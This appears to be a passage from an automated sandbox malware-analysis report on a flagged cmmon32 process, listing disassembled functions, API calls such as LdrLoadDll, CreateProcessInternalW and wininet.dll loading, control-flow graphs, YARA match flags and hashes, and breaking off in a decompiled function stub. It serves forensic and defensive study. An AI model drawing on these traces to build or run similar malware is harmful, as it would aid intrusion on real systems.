                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: c0dae682607209a9f746f7445fe0e2029a13c86504d18189fe76ebd3b05dbde4
                                                                                                                • Instruction ID: ffc7f0b7979d489648709c8b0ca263e3ed57c6378cbf9e5cf10aa99de37d3349
                                                                                                                • Opcode Fuzzy Hash: c0dae682607209a9f746f7445fe0e2029a13c86504d18189fe76ebd3b05dbde4
                                                                                                                • Instruction Fuzzy Hash: 8090027135114406F210619984047060055A7D1245F51C425A0819598D86D5D8957162
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e7ef172982041b9e3ff88dc36a1b2e4686901b7ea6cc1b8da9e53bcc35456c99
                                                                                                                • Instruction ID: 5913065260bf0483a8c7d710ec953102a4446c7753b7b7f7bb2387c315dee4f5
                                                                                                                • Opcode Fuzzy Hash: e7ef172982041b9e3ff88dc36a1b2e4686901b7ea6cc1b8da9e53bcc35456c99
                                                                                                                • Instruction Fuzzy Hash: 8590026925300006F2807199540860A0055A7D1246F91D429A000A598CC955D86D7361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7b96a5ecea05c9cf571ff62eb07d90113d8a152a26a528105d73ef352490c245
                                                                                                                • Instruction ID: d98985595fcc9854491c0d8fccc40fc2125b763bd8d301987c04a6f94cd9abe2
                                                                                                                • Opcode Fuzzy Hash: 7b96a5ecea05c9cf571ff62eb07d90113d8a152a26a528105d73ef352490c245
                                                                                                                • Instruction Fuzzy Hash: 58900261282041567645B19944045074056B7E0285791C026A1409990C8566E85AF661
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9a3b03e8c58f847957f44829c2376af9f93ca63ee2d10600c22f45964fe924d4
                                                                                                                • Instruction ID: 2072fe16823af285e3ef7bd42e6d9f3a1fb0838715714877b9e0ca1d75590af5
                                                                                                                • Opcode Fuzzy Hash: 9a3b03e8c58f847957f44829c2376af9f93ca63ee2d10600c22f45964fe924d4
                                                                                                                • Instruction Fuzzy Hash: AF90027124100417F211619945047070059A7D0285F91C426A0419598D9696D956B161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2606b88290f6c3bf68f7e1c5391df9476dc4049e66e95261dca8ed5c918bfac2
                                                                                                                • Instruction ID: e190250303336ab40fc77e65b3c46c21f23f2255518c08b873bf9d63c2e041a2
                                                                                                                • Opcode Fuzzy Hash: 2606b88290f6c3bf68f7e1c5391df9476dc4049e66e95261dca8ed5c918bfac2
                                                                                                                • Instruction Fuzzy Hash: 569002B124100406F240719944047460055A7D0345F51C025A5059594E8699DDD976A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 97cb8c9cd8fdd16761378b1738678a87fe2bdcf098f6a781356227ec2afdd2ce
                                                                                                                • Instruction ID: b7e137fafebadf97141d97b46c94e11584bdc05a9c7673211be42a788c01364c
                                                                                                                • Opcode Fuzzy Hash: 97cb8c9cd8fdd16761378b1738678a87fe2bdcf098f6a781356227ec2afdd2ce
                                                                                                                • Instruction Fuzzy Hash: 6E9002A138100446F20061994414B060055E7E1345F51C029E1059594D8659DC567166
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e4751826996e024dbeeccb1baa5f5b26f4aaf69e2e0896e421c1a84aa19d0b5f
                                                                                                                • Instruction ID: 48dbb6b46937930662e4834ace3086151af972d97a111027a6e5f806e0337c62
                                                                                                                • Opcode Fuzzy Hash: e4751826996e024dbeeccb1baa5f5b26f4aaf69e2e0896e421c1a84aa19d0b5f
                                                                                                                • Instruction Fuzzy Hash: 0790026125180046F30065A94C14B070055A7D0347F51C129A0149594CC955D8657561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B6ED6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 102sleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 217 3b6ed6-3b6f22 call 3b9c00 222 3b6f28-3b6f78 call 3b9cd0 call 3a9b20 call 3b3e30 217->222 223 3b6ffc-3b7002 217->223 230 3b6f80-3b6f91 Sleep 222->230 231 3b6f93-3b6f99 230->231 232 3b6ff6-3b6ffa 230->232 233 3b6f9b-3b6fc1 call 3b6b10 231->233 234 3b6fc3-3b6fe4 call 3b6d10 231->234 232->223 232->230 238 3b6fe9-3b6fec 233->238 234->238 238->232
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 003B6F88
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 9f9dbf2defd18941274e92b9ded9deac65df316e64d11de6e68e6274d64eefbe
                                                                                                                • Instruction ID: b22e2ca4e06276285aeb721e3c784d62ca24a2a820c4ce3033080bca5613808b
                                                                                                                • Opcode Fuzzy Hash: 9f9dbf2defd18941274e92b9ded9deac65df316e64d11de6e68e6274d64eefbe
                                                                                                                • Instruction Fuzzy Hash: 883106B1502304ABD712DF64D8A2FEBBBB8EB44708F14805AF71D5F642D778A905CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 239 3b6ee0-3b6f22 call 3b9c00 242 3b6f28-3b6f78 call 3b9cd0 call 3a9b20 call 3b3e30 239->242 243 3b6ffc-3b7002 239->243 250 3b6f80-3b6f91 Sleep 242->250 251 3b6f93-3b6f99 250->251 252 3b6ff6-3b6ffa 250->252 253 3b6f9b-3b6fc1 call 3b6b10 251->253 254 3b6fc3-3b6fe4 call 3b6d10 251->254 252->243 252->250 258 3b6fe9-3b6fec 253->258 254->258 258->252
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 003B6F88
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                • Opcode ID: 8fe69554f0aaca4b300acde52e6c82e5a517adc766a782ed3c70e5ca8a2f3a44
                                                                                                                • Instruction ID: 8a681d7c9ccc43d6101d9cfdddb17f715e533ff418d7e45e11621f6bf938a314
                                                                                                                • Opcode Fuzzy Hash: 8fe69554f0aaca4b300acde52e6c82e5a517adc766a782ed3c70e5ca8a2f3a44
                                                                                                                • Instruction Fuzzy Hash: E13190B1602304ABD712DF64D8A2FA7B7B8EB88704F00841DF61A6B642D774B545CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 354 3b84d0-3b8501 call 3b8dc0 RtlFreeHeap
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003A3B93), ref: 003B84FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID: .z`
                                                                                                                • API String ID: 3298025750-1441809116
                                                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                • Instruction ID: 61aa09b45c8b410233b46acd101525ef7536dd1bafc8592447a3b7e63bb1b0ad
                                                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                • Instruction Fuzzy Hash: BCE04FB12002046BD714DF59CC45EE777ACEF88750F014559FE085B241CA30F910CAF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003A7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003A72BA
                                                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003A72DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                • Instruction ID: 455c5df4fb534a1c474ef6dedca26bc38f937148b40b086c97f8680aaa12fde3
                                                                                                                • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                • Instruction Fuzzy Hash: 76012631A8022C77E722A6948C43FFE772C9B01B50F050119FF04BE1C2E6A47A0683F6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003A9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 485 3a9b20-3a9b49 call 3bab50 488 3a9b4b-3a9b4e 485->488 489 3a9b4f-3a9b5d call 3baf70 485->489 492 3a9b5f-3a9b6a call 3bb1f0 489->492 493 3a9b6d-3a9b7e call 3b9300 489->493 492->493 498 3a9b80-3a9b94 LdrLoadDll 493->498 499 3a9b97-3a9b9a 493->499 498->499
                                                                                                                APIs
                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 003A9B92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Load
                                                                                                                • String ID:
                                                                                                                • API String ID: 2234796835-0
                                                                                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                • Instruction ID: 45eb1a334c43a101eeaf9bd6c500ad798bbddc19b32676fc04312e94739599eb
                                                                                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                • Instruction Fuzzy Hash: 48011EB5D0020DBBDF11DAA4EC52FDDB7B89B54308F004195AA08AB641F671EB14CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B853D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 500 3b853d-3b855a call 3b8dc0 502 3b855f-3b8598 CreateProcessInternalW 500->502
                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003B8594
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 3911d7bf898aec5609bbf92944835cf773665b0f790e25eab75ee1eaf24d1e25
                                                                                                                • Instruction ID: 99140199fbafed50b77f5902dc7d42262ff2415ad3ca74ec7cc51dbf4030b4e9
                                                                                                                • Opcode Fuzzy Hash: 3911d7bf898aec5609bbf92944835cf773665b0f790e25eab75ee1eaf24d1e25
                                                                                                                • Instruction Fuzzy Hash: D90114B6208188AFCB04CF98DC90DEB3BBDAF8C314F158658FA5D97241C630E841CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 503 3b8540-3b8559 504 3b855f-3b8598 CreateProcessInternalW 503->504 505 3b855a call 3b8dc0 503->505 505->504
                                                                                                                APIs
                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003B8594
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateInternalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2186235152-0
                                                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                • Instruction ID: 4ad54f6f21947e0c0b74b367ad701768cfde30f41a7b2aad7b6f4b6f690d5d3b
                                                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                • Instruction Fuzzy Hash: 7B01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97241CA30E851CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,003ACCD0,?,?), ref: 003B704C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2422867632-0
                                                                                                                • Opcode ID: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                                                                                • Instruction ID: ad5d45099b34801db5e9ad63f3c8f694297eff4100b5d42403d678dd00c59cb6
                                                                                                                • Opcode Fuzzy Hash: 2c2d6e9fc8acbb6a6a71e86f53d40af0ca2f90e141fcb166cc422036d803619c
                                                                                                                • Instruction Fuzzy Hash: B8E06D733902143AE33165999C02FE7B39CCB81B64F550026FB0DEA6C1D5A5F90142A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B8621, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,003ACFA2,003ACFA2,?,00000000,?,?), ref: 003B8660
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 91871203f2c2a6b773c5229e29d5be06b7c18c066dadcddaa25a845df886b186
                                                                                                                • Instruction ID: f70de7cc3cf6f3bc9ba275db8a5d98281887e2c25b15d06eac07d0b37225137d
                                                                                                                • Opcode Fuzzy Hash: 91871203f2c2a6b773c5229e29d5be06b7c18c066dadcddaa25a845df886b186
                                                                                                                • Instruction Fuzzy Hash: DFF0EDB1300214AFCB20DF68CC80FD77B68EF88210F05856DFA899B241DA30E811CBE4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(003B3516,?,003B3C8F,003B3C8F,?,003B3516,?,?,?,?,?,00000000,00000000,?), ref: 003B84BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                • Instruction ID: 81e5d28c464521edc57a06254bdcbdb5314235f0c5709c85bb03ea72817d2c6f
                                                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                • Instruction Fuzzy Hash: DFE012B1200208ABDB14EF99CC41EA777ACAF88654F118959FA085B282CA30F910CAB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,003ACFA2,003ACFA2,?,00000000,?,?), ref: 003B8660
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction ID: ffd9e0e6cf1349bad4272d337e709aaf68a110014110d9f2f669762b8ad5d6c2
                                                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                • Instruction Fuzzy Hash: CCE01AB12002086BDB10DF49CC85EE737ADAF88650F018555FA085B241C930E8108BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003AD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,003A7C63,?), ref: 003AD43B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID:
                                                                                                                • API String ID: 2340568224-0
                                                                                                                • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                • Instruction ID: 664a693a0cb3eb61a984cef1012805e2da832cc2e3818c86d2faf068316af263
                                                                                                                • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                • Instruction Fuzzy Hash: 37D0A7727503043BE711FBA89C03F6632CC9B55B04F894064FA49DB7C3DD60F5004561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 003B8504, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003A3B93), ref: 003B84FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.475444887.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_3a0000_cmmon32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
                                                                                                                • Instruction ID: 5a2f4e1988967b6d6a007b0a25f1fbff457616f46a61ec74d2ab0aa5d293779e
                                                                                                                • Opcode Fuzzy Hash: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
                                                                                                                • Instruction Fuzzy Hash: FDC012721012119FC22AEBA0A8818F6B738EF853253250A9EE18D4B800CA219402DAD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 045B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.477383270.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.477926408.000000000466B000.00000040.00000001.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.477934562.000000000466F000.00000040.00000001.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_4550000_cmmon32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 669a077ea404a5cc62ba2e4d12ec5b630d7875795d1be5b7b8ee8486d0e72e9c
                                                                                                                • Instruction ID: c223a602d24a54ffa3bc84c67c4bab80d3b6e3873575d636cede2336060da920
                                                                                                                • Opcode Fuzzy Hash: 669a077ea404a5cc62ba2e4d12ec5b630d7875795d1be5b7b8ee8486d0e72e9c
                                                                                                                • Instruction Fuzzy Hash: E5B092B29424C5CAFB11EBA05A08B6B7A50BBD0745F26C066E2424681A4778E095F6F6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 04587D72, Relevance: .1, Instructions: 64COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E04587D72(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr* _t90;
				signed int _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				signed int _t101;
				void* _t105;
				char* _t110;
				char* _t115;
				signed char* _t125;
				signed char _t130;
